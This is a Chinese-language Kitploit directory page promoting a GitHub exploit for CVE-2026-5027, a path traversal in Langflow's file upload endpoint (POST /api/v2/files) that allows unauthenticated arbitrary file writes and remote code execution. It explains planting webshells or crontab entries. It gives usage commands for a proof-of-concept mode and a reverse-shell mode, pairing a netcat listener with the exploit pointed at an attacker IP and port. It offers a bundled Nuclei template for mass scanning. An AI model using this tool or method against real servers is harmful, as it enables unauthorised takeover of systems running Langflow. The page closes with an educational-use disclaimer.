Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-5027 — CVE-2026-5027 | Kitploit
工具/GitHubGitHub/0xblackash/cve-2026-5027
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHub0xblackash/cve-2026-5027

CVE-2026-5027

CVE-2026-5027

查看仓库
45个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔥 CVE-2026-5027 - Langflow 路径遍历

网络安全漏洞:路径遍历利用

任意文件写入导致 RCE
通过文件上传实现未认证远程代码执行

CVE CVSS Exploit

📌 概述

Langflow 在文件上传端点(POST /api/v2/files)存在严重的路径遍历漏洞。

攻击者可发送包含 ../ 序列的恶意文件名,在服务器文件系统的任意位置写入任意文件。

这很容易导致完全远程代码执行(RCE) —— 例如通过放置 WebShell 或注入 crontab。


🛠️ 功能特性

  • ✅ 未认证利用(默认自动登录配置)
  • ✅ 简单概念验证(向 /tmp 写入测试文件)
  • ✅ 通过 cron 实现完整反向 Shell(Linux)
  • ✅ 包含用于批量扫描的 Nuclei 模板
  • ✅ 轻松自定义遍历深度

🚀 快速开始

1. 概念验证(安全测试)

root@kitploit:~
python3 CVE-2026-5027.py -t http://target:7860/ --proof

若存在漏洞,预期输出:

root@kitploit:~
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt

2. 完整反向 Shell

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444

📁 仓库内容

FileDescription
CVE-2026-5027.py主要 Python 利用程序(PoC + RCE)
CVE-2026-5027.yaml用于扫描的 Nuclei 模板
README.md本文件

🎯 使用示例

cve-2026-5027

验证模式

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --proof

反向 Shell 模式

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444

⚠️ 免责声明

本仓库仅用于教育和授权安全测试目的。

请负责任地使用,且仅用于你拥有明确测试许可的系统。


用 ❤️ 为红队社区制作

下载工具